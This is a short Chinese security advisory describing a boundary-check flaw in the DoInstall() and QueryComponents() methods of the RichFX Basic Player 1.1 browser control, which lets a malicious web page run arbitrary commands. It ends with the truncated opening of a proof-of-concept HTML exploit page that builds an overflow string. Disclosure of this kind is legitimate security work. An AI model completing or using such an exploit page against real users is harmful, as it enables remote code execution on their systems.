RichFX Basic Player是一款基于浏览器的媒体播放插件。
RichFX Basic Player包含的控件不正确过滤参数数据,远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。
问题是控件对DoInstall(),QueryComponents()方法的参数缺少充分边界检查,构建恶意WEB页,诱使用户打开,可导致以应用程序进程权限执行任意指令。
RichFX RichFX Basic Player 1.1
目前没有解决方案提供:
<a href=“http://www.richfx.com” target=“_blank”>http://www.richfx.com</a>
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";<br